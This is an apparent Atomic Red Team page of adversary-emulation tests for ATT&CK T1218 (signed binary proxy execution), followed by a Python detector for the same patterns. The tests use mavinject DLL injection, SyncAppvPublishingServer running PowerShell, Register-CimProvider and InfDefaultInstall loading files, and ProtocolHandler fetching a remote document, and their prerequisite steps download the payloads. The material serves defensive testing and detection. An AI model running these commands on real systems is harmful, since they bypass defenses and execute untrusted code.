T1218
Signed Binary Proxy Execution
Description from ATT&CK
Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries. Binaries used in this technique are often Microsoft-signed files, indicating that they have been either downloaded from Microsoft or are already native in the operating system.(Citation: LOLBAS Project) Binaries signed with trusted digital certificates can typically execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files or commands.
Similarly, on Linux systems adversaries may abuse trusted binaries such as split to proxy execution of malicious commands.(Citation: split man page)(Citation: GTFO split)
Atomic Tests
Atomic Test #1 - mavinject - Inject DLL into running process
Injects an arbitrary DLL into the running process specified by process ID. Requires Windows 10.
Supported Platforms: windows
auto_generated_guid: c426dacf-575d-4937-8611-a148a86a5e61
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
process_id | PID of process receiving injection | string | 1000 |
dll_payload | DLL to inject | Path | PathToAtomicsFolder\T1218\src\x64\T1218.dll |
Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)
mavinject.exe #{process_id} /INJECTRUNNING #{dll_payload}
Dependencies: Run with powershell!
Description: T1218.dll must exist on disk at specified location (#{dll_payload})
Check Prereq Commands:
if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/x64/T1218.dll" -OutFile "#{dll_payload}"
Atomic Test #2 - SyncAppvPublishingServer - Execute arbitrary PowerShell code
Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe. Requires Windows 10.
Supported Platforms: windows
auto_generated_guid: d590097e-d402-44e2-ad72-2c6aa1ce78b1
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
powershell_code | PowerShell code to execute | string | Start-Process calc.exe |
Attack Commands: Run with command_prompt!
SyncAppvPublishingServer.exe "n; #{powershell_code}"
Atomic Test #3 - Register-CimProvider - Execute evil dll
Executes an arbitrary DLL. Requires at least Windows 8/2012. Note that this DLL can also be served via SMB.
Supported Platforms: windows
auto_generated_guid: ad2c17ed-f626-4061-b21e-b9804a6f3655
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
dll_payload | DLL to execute | Path | PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll |
Attack Commands: Run with command_prompt!
C:\Windows\SysWow64\Register-CimProvider.exe -Path #{dll_payload}
Dependencies: Run with powershell!
Description: T1218-2.dll must exist on disk at specified location (#{dll_payload})
Check Prereq Commands:
if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218-2.dll" -OutFile "#{dll_payload}"
Atomic Test #4 - InfDefaultInstall.exe .inf Execution
Tests execution of a .inf file using InfDefaultInstall.exe.
Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Infdefaultinstall.yml
Supported Platforms: windows
auto_generated_guid: 54ad7d5a-a1b5-472c-b6c4-f8090fb2daef
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
inf_to_execute | Local location of inf file | string | PathToAtomicsFolder\T1218\src\Infdefaultinstall.inf |
Attack Commands: Run with command_prompt!
InfDefaultInstall.exe #{inf_to_execute}
Dependencies: Run with powershell!
Description: INF file must exist on disk at specified location (#{inf_to_execute})
Check Prereq Commands:
if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Infdefaultinstall.inf" -OutFile "#{inf_to_execute}"
Atomic Test #5 - ProtocolHandler.exe Downloaded a Suspicious File
Emulates an attack delivered through documents via the protocol handler in Microsoft Office. On successful execution you should see Microsoft Word launch a blank file.
Supported Platforms: windows
auto_generated_guid: db020456-125b-4c8b-a4a7-487df8afb5a2
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
microsoft_wordpath | path to office folder | path | C:\Program Files\Microsoft Office\Office16 |
remote_url | url to document | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218/src/T1218Test.docx |
Attack Commands: Run with command_prompt!
#{microsoft_wordpath}\protocolhandler.exe "ms-word:nft|u|#{remote_url}"
Dependencies: Run with powershell!
Description: Microsoft Word must be installed with the correct path and protocolhandler.exe must be provided
Check Prereq Commands:
if (Test-Path "#{microsoft_wordpath}\protocolhandler.exe") {exit 0} else {exit 1}
Get Prereq Commands:
write-host "Install Microsoft Word or provide correct path."
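The five tests above each leave a distinctive process-creation record, which is what a detection engineer would want to match. The following Python is an added example (not part of the Atomic Red Team page or its tests) that scores process-creation events against the command-line shapes of Atomic Tests #1 through #5. Assumptions of this example, not statements from the page: event fields named after Sysmon Event ID 1 (image, command line), a constructed C:\AtomicRedTeam\atomics install path in the sample events, and the heuristic that legitimate CIM providers and .inf files live under C:\Windows, so a Register-CimProvider -Path or an InfDefaultInstall .inf outside it is treated as suspicious.

```python
"""Added example: flag process-creation records that match the five T1218
atomic tests on this page. Not part of Atomic Red Team. Event fields follow
Sysmon Event ID 1 naming; every sample event below is constructed."""
import re
from dataclasses import dataclass

WINDOWS_DIR = "c:\\windows\\"   # assumption: legitimate providers / .inf files ship under here


@dataclass
class ProcEvent:
    image: str          # full path of the new process
    command_line: str   # command line as logged


def split_cmdline(cmd):
    """Split a Windows command line on whitespace, honouring double quotes."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmd)]


def image_name(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def outside_windows_dir(path):
    return not path.lower().startswith(WINDOWS_DIR)


# One predicate per atomic test; each receives the arguments after argv[0].
def mavinject_rule(args):
    low = [a.lower() for a in args]
    return "/injectrunning" in low and any(a.endswith(".dll") for a in low)


def syncappv_rule(args):
    # "n;" sync-mode argument followed by a PowerShell statement (Atomic Test #2)
    return any(re.match(r"n;\s*\S", a, re.I) for a in args)


def cimprovider_rule(args):
    # -Path naming a DLL outside the Windows directory (Atomic Test #3)
    for i, a in enumerate(args[:-1]):
        if a.lower() == "-path" and outside_windows_dir(args[i + 1]):
            return True
    return False


def infdefaultinstall_rule(args):
    # .inf outside the Windows directory (Atomic Test #4)
    return any(a.lower().endswith(".inf") and outside_windows_dir(a) for a in args)


def protocolhandler_rule(args):
    # ms-word: URI in |u| form pointing at a remote document (Atomic Test #5)
    return any(re.match(r"ms-word:.*\|u\|https?://", a, re.I) for a in args)


RULES = [
    ("T1218 #1 mavinject /INJECTRUNNING", "mavinject.exe", mavinject_rule),
    ("T1218 #2 SyncAppvPublishingServer inline PowerShell", "syncappvpublishingserver.exe", syncappv_rule),
    ("T1218 #3 Register-CimProvider non-system DLL", "register-cimprovider.exe", cimprovider_rule),
    ("T1218 #4 InfDefaultInstall non-system .inf", "infdefaultinstall.exe", infdefaultinstall_rule),
    ("T1218 #5 ProtocolHandler remote ms-word URI", "protocolhandler.exe", protocolhandler_rule),
]


def match_rules(event):
    """Names of the rules an event trips: the image name must match, then the predicate."""
    name = image_name(event.image)
    args = split_cmdline(event.command_line)[1:]
    return [rule for rule, img, pred in RULES if name == img and pred(args)]


def scan(events):
    """(event, matched rule names) for every event that trips at least one rule."""
    results = []
    for e in events:
        hits = match_rules(e)
        if hits:
            results.append((e, hits))
    return results


ATOMICS = r"C:\AtomicRedTeam\atomics"   # constructed install path for the samples

SAMPLE_EVENTS = [  # constructed; the first five mirror the page's tests, the last two are benign
    ProcEvent(r"C:\Windows\System32\mavinject.exe",
              rf"mavinject.exe 1000 /INJECTRUNNING {ATOMICS}\T1218\src\x64\T1218.dll"),
    ProcEvent(r"C:\Windows\System32\SyncAppvPublishingServer.exe",
              'SyncAppvPublishingServer.exe "n; Start-Process calc.exe"'),
    ProcEvent(r"C:\Windows\SysWOW64\Register-CimProvider.exe",
              rf"C:\Windows\SysWow64\Register-CimProvider.exe -Path {ATOMICS}\T1218\src\Win32\T1218-2.dll"),
    ProcEvent(r"C:\Windows\System32\InfDefaultInstall.exe",
              rf"InfDefaultInstall.exe {ATOMICS}\T1218\src\Infdefaultinstall.inf"),
    ProcEvent(r"C:\Program Files\Microsoft Office\Office16\protocolhandler.exe",
              r'"C:\Program Files\Microsoft Office\Office16\protocolhandler.exe" '
              r'"ms-word:nft|u|https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218/src/T1218Test.docx"'),
    ProcEvent(r"C:\Windows\System32\Register-CimProvider.exe",
              r"Register-CimProvider.exe -Path C:\Windows\System32\wbem\example.dll"),
    ProcEvent(r"C:\Windows\System32\notepad.exe", r"notepad.exe C:\Users\alice\notes.txt"),
]

if __name__ == "__main__":
    for e, hits in scan(SAMPLE_EVENTS):
        print(f"{image_name(e.image):32} {', '.join(hits)}")
```

Run it as-is and the five test-shaped events are reported while the two benign ones are not. The image-name gate keeps each predicate cheap and specific; the C:\Windows heuristic is deliberately coarse and should be tuned against the App-V, CIM-provider and driver-install activity that is normal in a given environment before the rules are promoted to alerts.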